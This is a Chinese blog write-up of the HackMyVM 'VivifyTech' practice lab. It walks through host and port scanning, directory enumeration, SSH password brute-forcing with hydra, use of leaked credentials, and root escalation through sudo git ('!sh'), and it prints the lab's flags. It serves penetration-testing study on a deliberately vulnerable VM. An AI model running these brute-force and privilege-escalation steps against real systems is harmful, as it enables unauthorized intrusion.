HackMyVM-VivifyTech靶机的测试报告

最新推荐文章于 2025-01-17 17:34:50 发布
最新推荐文章于 2025-01-17 17:34:50 发布
阅读量592 收藏 26
点赞数 11
CC 4.0 BY-SA版权
分类专栏: HackMyVM靶场 文章标签: 网络安全 HackMyVM靶场 VivifyTech sudo提权 ssh git提权 hydra
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79698171/article/details/145017468

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、信息搜集

2、Getshell

3、提权

四、结论

一、测试环境

1、系统环境

渗透机:kali2021.1(192.168.101.127)

靶  机:debian(192.168.101.109)

注意事项:

①该类型靶场只能在virtualBox上搭建,因此将靶机设置为桥接网络,方便进行渗透。攻击机kali也要桥接出来,不然会出问题。

②靶机启动失败:设置中取消勾选usb即可

2、使用工具/软件

Kali: arp-scan(主机探测)、nmap(端口和服务探测)、gobuster(目录扫描)、cmseek(探测cms信息)、hydra(爆破ssh登录)、ssh(远程连接)

测试网址:http://192.168.101.109

靶场介绍:由国外大佬搭建的靶场,类似于vulnhub,经常更新,需要翻墙才能进。

地址:https://hackmyvm.eu/machines/machine.php?vm=VivifyTech

二、测试目的

练习渗透思路,熟悉git提权命令。

三、操作过程

1、信息搜集

主机探测

arp-scan -l

靶机IP:192.168.101.109

物理机IP:192.168.101.241

端口和服务探测

nmap -sT -A -p- -T4 192.168.101.109

开放了22端口(ssh服务)、80端口(web服务)、3306服务(MySQL服务)、33060端口

目录扫描

gobuster dir -u http://192.168.101.109 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

可以看到存在wordpress服务

扫描wordpress目录

存在很多目录

gobuster dir -u http://192.168.101.109/wordpress -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

收集wordpress信息

​cmseek -u http://192.168.101.109/wordpress

找到一个用户名:sancelisso

在wordpress目录主页

下方有个看、读、听的模块

在这个故事中,有几个人名,是后面需要用到的

Sarah、Mark、Emily、Jake

在wordpress的wp-includes目录中泄露了很多源码

并且有secret密码文档

2、Getshell

将密码文档下载,尝试爆破sancelisso用户的密码

wpscan --url http://192.168.101.109/wordpress/ -U sancelisso -P secrets.txt

爆破失败了,看来这不是wordpress的密码

记得那四个人名吗?

尝试使用它作为用户名,爆破ssh登录,密码就使用secrets.txt

需要注意的是:用户名要小写才能爆破成功

vim user.txt
cat user.txt
hydra -L user.txt -P secrets.txt ssh://192.168.101.109 -I -f

尝试ssh登录靶机,爆破成功

ssh sarah@192.168.101.109

可以在家目录看到user.txt : HMV{Y0u_G07_Th15_0ne_6543}

ls -la
cat user.txt

3、提权

可以在Sarah的家目录发现两个隐藏目录

在.private目录中有一个Tasks.txt文件,提到了一个用户gbodja并且给出了密码,而且说这个用户有任务上的信任

cd .private/
cat Tasks.txt

gbodja:4Tch055ouy370N

切换到gbodja用户,成功切换

su gbodja

查看sudo权限发现,果然这个用户有特权,该用户可以sudo执行git命令

sudo -l

查看git命令提权的文档:git | GTFOBins icon-default.png?t=O83Ahttps://gtfobins.github.io/gtfobins/git/

只需要进入交互式界面,输入!sh即可提权

sudo git -p -h config

!sh
cd
cat root.txt

可以看到root.txt:HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}

四、结论

知道了git工具sudo提权的方法,熟悉了渗透思路。

hackmyvm-pwned靶机渗透测试报告
初学者
02-10 955
这样就可以实现操作了,笔者查看相关资料的时候,遇到找到.ssh文件然后通过ssh的方式进行连接,实现root的ssh连接。
DC-1靶机渗透测试
weixin_52003758的博客
03-17 514
DC-1靶机渗透测试
hackmyvm-pwned靶机
weixin_52710247的博客
11-17 463
hackmyvm-pwned靶机复现
HackMyVM-Nowords靶机测试报告
ccc_9wy的博客
01-17 1133
基于渗透测试流程渗透Nowords靶机HackMyVM靶场;ai识图;python识图;定时任务;内核漏洞;ftp。
HackMyVM-Again靶机测试报告
ccc_9wy的博客
01-03 1175
基于渗透测试流程渗透Again靶机HackMyVM靶场;文件上传漏洞;PHP代码审计;setcap;php Capabilities;越修改文件限。
HackMyVM-Airbind靶机测试报告
ccc_9wy的博客
01-03 1127
基于渗透测试流程测试Airbind靶机HackMyVM靶场;wallos文件上传RCE漏洞;iptables;ipv6;ssh远程连接。
HackMyVM-Always靶机测试报告
ccc_9wy的博客
01-06 685
基于渗透测试流程测试该Always靶机HackMyVM靶场;Windows渗透;win7;ctf;rdp远程桌面;msfconsole渗透。
HackMyVM-Adroit靶机测试报告
ccc_9wy的博客
01-02 1204
基于渗透测试流程渗透Adroit靶机HackMyVM靶场;反编译jar包;msfvenom;jar木马;ftp服务;sql注入;解密;java编程;
HackMyVM-XMAS靶机测试报告
ccc_9wy的博客
01-15 1022
基于渗透测试流程测试XMAS靶机HackMyVM靶场;圣诞节主题;php反弹shell;python反弹shell;jar反弹shell;hosts;msfconsole。
HackMyVM-Whitedoor靶机测试报告
ccc_9wy的博客
01-15 720
基于渗透测试流程测试Whitedoor靶机HackMyVM靶场;命令执行;ssh登录;john;爆破hash;vim
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
对DC-2靶机进行渗透测试
zll___的博客
03-11 1147
对DC-2靶机进行渗透测试
对DC-6靶机进行渗透测试
zll___的博客
03-20 1066
对DC-6靶机进行渗透测试
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8753
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
python版本基于ChatGLM的飞书机器人.zip
08-22
python版本基于ChatGLM的飞书机器人.zip
CSP竞赛动态规划与图论高效代码实现:Dijkstra算法及状态压缩DP的应用与优化
08-22
内容概要:本文聚焦于CSP竞赛中从动态规划到图论的高效代码实现,重点介绍了动态规划中的背包问题及其代码实现,通过状态转移方程和滚动数组优化空间复杂度;阐述了状态压缩的概念,特别是位运算表示状态的方法,适用于子集枚举问题;详细讲解了图论中的Dijkstra算法,利用优先队列优化最短路径计算,确保每次取出距离最小的节点,并进行松弛操作更新邻接节点的最短距离。最后展望了多语言支持的发展趋势以及竞赛平台智能化的趋势。; 适合人群:对CSP竞赛感兴趣并有一定编程基础的学生或爱好者,尤其是希望高算法竞赛水平的参赛者。; 使用场景及目标:①理解动态规划的核心思想,掌握背包问题的状态转移方程和优化技巧;②学会使用位运算进行状态压缩,解决子集枚举问题;③掌握Dijkstra算法的实现细节,理解优先队列的作用和松弛操作的原理。; 阅读建议:本文涉及较多代码实例,建议读者在阅读过程中亲自编写和调试代码,以便更好地理解和掌握相关算法的实现细节。同时关注未来发展趋势,为参加竞赛做好准备。
电气工程基于阻抗频谱的电缆缺陷检测与定位方法研究:电缆健康监测系统设计及实验验证(论文复现含详细代码及解释)
最新发布
08-22
内容概要:该论文研究了一种基于阻抗频谱的电缆缺陷检测与定位方法。主要内容包括:(1)建立含局部缺陷的电缆模型,通过Matlab仿真分析局部过热、老化、破损对电缆参数的影响;(2)出新型积分变换方法将阻抗频谱从频域转换到空间域实现缺陷定位,并对60m~1000m电缆进行多缺陷定位仿真;(3)通过实验验证了15m-82m电缆的缺陷类型判别和定位的可行性,相比传统方法具有更高准确性和抗干扰性。研究为电缆缺陷检测供了新思路。 适合人群:从事电力电缆维护与检测的技术人员、研究人员以及相关专业的高校师生。 使用场景及目标:①电力系统中电缆的定期巡检和故障排查;②电缆制造商的质量控制和产品测试;③高电缆缺陷检测的准确性和效率,降低维护成本和风险。 其他说明:论文详细介绍了电缆建模、参数仿真、阻抗谱特征分析、缺陷定位算法和老化状态评估等核心技术环节,并通过实验验证了方法的有效性。文中还供了大量Python代码实现,便于读者理解和复现研究结果。此外,该研究出了多项创新点,如无衰减核函数积分变换、阻抗谱特征与缺陷类型的映射关系等,为后续研究和技术应用奠定了基础。
《Selenium3自动化测试实战--基于Python语言》书中代码.zip
08-22
《Selenium3自动化测试实战--基于Python语言》书中代码.zip
ctkqiang_HuaTuoAI_27288_1755685691704.zip
08-22
ctkqiang_HuaTuoAI_27288_1755685691704.zip
DC-1靶机渗透测试攻略及DC-2靶机简介
资源摘要信息:"Vulnhub是一个著名的在线平台,供了各种用于渗透测试练习的靶机靶机是指计算机系统、网络或应用程序,设计用来模拟真实环境中的安全漏洞,供安全研究人员、学生或爱好者进行攻击和防御练习。DC-1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ccc_9wy

觉得写的好的话就赏杯奶茶喝吧~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值